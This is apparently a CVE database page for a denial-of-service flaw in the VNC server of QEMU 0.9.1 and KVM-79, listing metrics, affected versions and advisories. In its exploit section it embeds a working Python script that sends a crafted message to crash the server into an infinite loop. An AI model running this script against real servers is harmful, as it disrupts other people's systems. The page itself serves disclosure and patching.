CVE-2008-2382 : Detail

10.01%V3
Network
2008-12-24
16h00 +00:00
2018-10-11
17h57 +00:00

CVE Descriptions

The protocol_client_msg function in vnc.c in the VNC server in (1) Qemu 0.9.1 and earlier and (2) KVM kvm-79 and earlier allows remote attackers to cause a denial of service (infinite loop) via a certain message.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of others.

Exploit information

Exploit Database EDB-ID : 32675

Publication date : 2008-12-21
23h00 +00:00
Author : Alfredo Ortega
EDB Verified : Yes

source: https://www.securityfocus.com/bid/32910/info

QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.

Attackers can exploit this issue to create a denial-of-service condition.

The following are vulnerable:

QEMU 0.9.1 and prior
KVM-79 and prior

##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))

# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types
sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
    print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)
s.close()

Products Mentioned

Configuration 0

Qemu>>Qemu >> Version To (including) 0.9.1

Qemu>>Qemu >> Version 0.1.0

Qemu>>Qemu >> Version 0.1.1

Qemu>>Qemu >> Version 0.1.2

Qemu>>Qemu >> Version 0.1.3

Qemu>>Qemu >> Version 0.1.4

Qemu>>Qemu >> Version 0.1.5

Qemu>>Qemu >> Version 0.1.6

Qemu>>Qemu >> Version 0.2.0

Qemu>>Qemu >> Version 0.3.0

Qemu>>Qemu >> Version 0.4.0

Qemu>>Qemu >> Version 0.4.1

Qemu>>Qemu >> Version 0.4.2

Qemu>>Qemu >> Version 0.4.3

Qemu>>Qemu >> Version 0.5.0

Qemu>>Qemu >> Version 0.5.1

Qemu>>Qemu >> Version 0.5.2

Qemu>>Qemu >> Version 0.5.3

Qemu>>Qemu >> Version 0.5.4

Qemu>>Qemu >> Version 0.5.5

Qemu>>Qemu >> Version 0.6.0

Qemu>>Qemu >> Version 0.6.1

Qemu>>Qemu >> Version 0.7.0

Qemu>>Qemu >> Version 0.7.1

Qemu>>Qemu >> Version 0.7.2

Qemu>>Qemu >> Version 0.8.0

Qemu>>Qemu >> Version 0.8.1

Qemu>>Qemu >> Version 0.8.2

Qemu>>Qemu >> Version 0.9.0

Configuration 0

Kvm_qumranet>>Kvm >> Version To (including) 79

Kvm_qumranet>>Kvm >> Version 1

Kvm_qumranet>>Kvm >> Version 2

Kvm_qumranet>>Kvm >> Version 3

Kvm_qumranet>>Kvm >> Version 4

Kvm_qumranet>>Kvm >> Version 5

Kvm_qumranet>>Kvm >> Version 6

Kvm_qumranet>>Kvm >> Version 7

Kvm_qumranet>>Kvm >> Version 8

Kvm_qumranet>>Kvm >> Version 9

Kvm_qumranet>>Kvm >> Version 10

Kvm_qumranet>>Kvm >> Version 11

Kvm_qumranet>>Kvm >> Version 12

Kvm_qumranet>>Kvm >> Version 13

Kvm_qumranet>>Kvm >> Version 14

Kvm_qumranet>>Kvm >> Version 15

Kvm_qumranet>>Kvm >> Version 16

Kvm_qumranet>>Kvm >> Version 17

Kvm_qumranet>>Kvm >> Version 18

Kvm_qumranet>>Kvm >> Version 19

Kvm_qumranet>>Kvm >> Version 20

Kvm_qumranet>>Kvm >> Version 21

Kvm_qumranet>>Kvm >> Version 22

Kvm_qumranet>>Kvm >> Version 23

Kvm_qumranet>>Kvm >> Version 24

Kvm_qumranet>>Kvm >> Version 25

Kvm_qumranet>>Kvm >> Version 26

Kvm_qumranet>>Kvm >> Version 27

Kvm_qumranet>>Kvm >> Version 28

Kvm_qumranet>>Kvm >> Version 29

Kvm_qumranet>>Kvm >> Version 30

Kvm_qumranet>>Kvm >> Version 31

Kvm_qumranet>>Kvm >> Version 32

Kvm_qumranet>>Kvm >> Version 33

Kvm_qumranet>>Kvm >> Version 34

Kvm_qumranet>>Kvm >> Version 35

Kvm_qumranet>>Kvm >> Version 36

Kvm_qumranet>>Kvm >> Version 37

Kvm_qumranet>>Kvm >> Version 38

Kvm_qumranet>>Kvm >> Version 39

Kvm_qumranet>>Kvm >> Version 40

Kvm_qumranet>>Kvm >> Version 41

Kvm_qumranet>>Kvm >> Version 42

Kvm_qumranet>>Kvm >> Version 43

Kvm_qumranet>>Kvm >> Version 44

Kvm_qumranet>>Kvm >> Version 45

Kvm_qumranet>>Kvm >> Version 46

Kvm_qumranet>>Kvm >> Version 47

Kvm_qumranet>>Kvm >> Version 48

Kvm_qumranet>>Kvm >> Version 49

Kvm_qumranet>>Kvm >> Version 50

Kvm_qumranet>>Kvm >> Version 51

Kvm_qumranet>>Kvm >> Version 52

Kvm_qumranet>>Kvm >> Version 53

Kvm_qumranet>>Kvm >> Version 54

Kvm_qumranet>>Kvm >> Version 55

Kvm_qumranet>>Kvm >> Version 56

Kvm_qumranet>>Kvm >> Version 57

Kvm_qumranet>>Kvm >> Version 58

Kvm_qumranet>>Kvm >> Version 59

Kvm_qumranet>>Kvm >> Version 60

Kvm_qumranet>>Kvm >> Version 61

Kvm_qumranet>>Kvm >> Version 62

Kvm_qumranet>>Kvm >> Version 63

Kvm_qumranet>>Kvm >> Version 64

Kvm_qumranet>>Kvm >> Version 65

Kvm_qumranet>>Kvm >> Version 66

Kvm_qumranet>>Kvm >> Version 67

Kvm_qumranet>>Kvm >> Version 68

Kvm_qumranet>>Kvm >> Version 69

Kvm_qumranet>>Kvm >> Version 70

Kvm_qumranet>>Kvm >> Version 71

Kvm_qumranet>>Kvm >> Version 72

Kvm_qumranet>>Kvm >> Version 73

Kvm_qumranet>>Kvm >> Version 74

Kvm_qumranet>>Kvm >> Version 75

Kvm_qumranet>>Kvm >> Version 76

Kvm_qumranet>>Kvm >> Version 77

Kvm_qumranet>>Kvm >> Version 78

References

http://secunia.com/advisories/35062
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1021489
Tags : vdb-entry, x_refsource_SECTRACK
http://securityreason.com/securityalert/4803
Tags : third-party-advisory, x_refsource_SREASON
http://www.vupen.com/english/advisories/2008/3488
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/33303
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34642
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33293
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-776-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/33350
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33568
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1021488
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/32910
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2008/3489
Tags : vdb-entry, x_refsource_VUPEN